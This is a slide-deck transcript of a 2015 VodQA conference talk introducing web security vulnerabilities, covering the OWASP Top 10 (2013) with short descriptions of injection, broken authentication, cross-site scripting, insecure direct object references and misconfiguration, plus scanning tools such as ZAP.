Introduction to security vulnerabilities

Transcript

1. INTRODUCTION TO SECURITY VULNERABILITIES Shirish Padalkar VodQA, Hyderabad, December 2015

   1

2. ABOUT ME 2

3. AGENDA ▫︎Some vocabulary ▫︎Introduction to OWASP ▫︎OWASP top 10 ▫︎Some

   demos ▫︎Tools ▫︎References 3

4. 4 VOCABULARY

5. 5 VULNERABILITY

6. Vulnerability refers to the inability of a system to withstand

   the effects of a hostile environment. 6

7. In computer security: A vulnerability is a weakness which allows

   an attacker to reduce a system's information assurance. 7

8. 8 EXPLOIT

9. Exploit means to take advantage of something for one's own

   end, especially unethically or unjustifiably. 9

10. An exploit is a piece of software that takes advantage

    of a bug or vulnerability in order to cause unintended behaviour to occur on computer software or hardware 10

11. 11

12. OWASP ▫︎Open Web Application Security Project ▫︎Not-for-profit charitable organisation ▫︎Focused

    on improving the security of software ▫︎All materials are available under a FOSS license ▫︎Currently has over 142 active projects 12

13. 13 https://www.owasp.org

14. OWASP TOP 10 ▫︎List of the 10 most critical web

    application security risks ▫︎A powerful awareness document ▫︎Reference document for project security analysis ▫︎Published at regular intervals ▫︎Approximately once in 3 years ▫︎Last published in 2013 14

15. OWASP TOP 10, 2013 1. Injection 2. Broken authentication and

    session management 3. Cross site scripting (XSS) 4. Insecure direct object references 5. Security misconfiguration 6. Sensitive data exposure 7. Missing function level access control 8. Cross site request forgery (CSRF) 9. Using components with known vulnerability 10.Unvalidated redirects and forwards 15

16. OWASP TOP 10, 2013 1. Injection 2. Broken authentication and

    session management 3. Cross site scripting (XSS) 4. Insecure direct object references 5. Security misconfiguration 6. Sensitive data exposure 7. Missing function level access control 8. Cross site request forgery (CSRF) 9. Using components with known vulnerability 10.Unvalidated redirects and forwards 16

17. 17 INJECTION

18. INJECTION ▫︎SQL Injection ▫︎Most prevalent ▫︎Databases like Oracle, MySQL ▫︎NoSQL

    Injection ▫︎Comparatively recent ▫︎Databases like MongoDB ▫︎Command Injection ▫︎LDAP Injection 18

19. 19 DEMO

20. INJECTION 20

21. INJECTION 21

22. 22 BROKEN AUTHENTICATION

23. BROKEN AUTHENTICATION ▫︎Session ID in URL or in the referrer

    header ▫︎PHPSESSID ▫︎JSESSIONID ▫︎Unencrypted passwords in storage or transit ▫︎Login over HTTP ▫︎Email password in plain text (BSNL?) ▫︎Predictable session IDs ▫︎Reusing same session IDs 23

24. 24 CROSS SITE SCRIPTING

25. CROSS SITE SCRIPTING (XSS) ▫︎Inject client-side script into pages viewed

    by other users ▫︎No HTML or Javascript escaping ▫︎Can steal cookies, change page location, etc. ▫︎Script executes with same permission as current page 25

26. XSS TYPES ▫︎Reflected ▫︎Non-persistent ▫︎The most common type ▫︎Is typically

    delivered via email or a neutral web site ▫︎Display a page of results for a user, without properly sanitising the request. ▫︎Ex. Search result with search term without sanitisation 26

27. XSS TYPES ▫︎Stored ▫︎Persistent ▫︎A more devastating variant ▫︎Permanently displayed

    on "normal" pages returned to other users ▫︎Example: Online message boards / Forums, Post on Facebook wall 27

28. 28 DEMO

29. CROSS SITE SCRIPTING (XSS) 29

30. CROSS SITE SCRIPTING (XSS) 30

31. 31 INSECURE DIRECT OBJECT REFERENCES

32. INSECURE DIRECT OBJECT REFERENCES ▫︎Actual name or key of an

    object when generating web pages ▫︎Don’t verify the user is authorised for the target object ▫︎Attackers can easily manipulate parameter values to access another object ▫︎http://photos.com/download.php?file=personal.jpg ▫︎http://mybank.com/accountInfo?accNumber=123456 32

33. 33 SECURITY MISCONFIGURATION

34. SECURITY MISCONFIGURATION ▫︎Running the application with debug enabled in production.

    ▫︎Directory listing enabled on the server ▫︎Running outdated software ▫︎Unnecessary services running on the machine ▫︎Not changing default keys and passwords ▫︎Revealing error handling information to the attackers, such as stack traces. 34

35. OWASP TOP 10, 2013 1. Injection 2. Broken authentication and

    session management 3. Cross site scripting (XSS) 4. Insecure direct object references 5. Security misconfiguration 6. Sensitive data exposure 7. Missing function level access control 8. Cross site request forgery (CSRF) 9. Using components with known vulnerability 10.Unvalidated redirects and forwards 35

36. TOOLS 36

37. VULNERABILITY SCANNING 37

38. SECURITY TESTING - ZAP 38

39. SECURITY TESTING - ZAP 39 https://blog.codecentric.de/files/2013/10/zap-screenshot.png

40. CONTINUOUS SECURITY TESTING 40

41. ANY QUESTIONS? 41 @_Garbage_ [email protected]

42. RESOURCES ▫︎https://www.owasp.org/index.php ▫︎https://www.owasp.org/index.php/ OWASP_Zed_Attack_Proxy_Project ▫︎https://en.wikipedia.org/wiki/Cross-site_scripting ▫︎http://www.toptal.com/security/10-most-common-web- security-vulnerabilities 42

43. ThoughtWorks is hiring. http://www.thoughtworks.com/join THANK YOU!